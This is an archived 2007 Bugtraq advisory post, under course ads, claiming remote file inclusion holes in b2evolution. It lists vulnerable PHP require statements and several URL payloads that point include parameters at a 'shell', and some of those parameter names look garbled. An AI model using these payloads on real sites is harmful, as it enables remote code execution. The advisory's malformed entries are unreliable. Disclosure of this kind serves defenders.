Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

Remote File Inclusion

Subject: Remote File Inclusion
Date: 25 Apr 2007 15:37:24 -0000
####################################################
# b2evolution         Remote File Inclusion        #
####################################################
Affected Software .:     b2evolution               #
Download..: http://b2evolution.net/                #
Risk ..............: high                          #
Date .........: 25/4/2007                          #
Found by ..........: s433d_only_linux              #
Contact ...........: s433d_only_linux@yahoo.de     #
Web .............: Www.hackerz.ir                  #
special thanx ........... Ali Jasbi my beste friend#
####################################################

####################################################
Affected File:
b2evolution\blogs/a_noskin.php  require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php    require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php     require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php     require 
$view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php     require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php     require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php   require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php   require $skins_path.'_msgform.php';
b2evolution\blogs/default.php   require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php     require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php     require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php        require_once 
$inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php        require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php        require $skins_path.'_feedback.php';
######################################################
b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell

<Prev in Thread] Current Thread [Next in Thread>
  • Remote File Inclusion, s433d_only_linux <=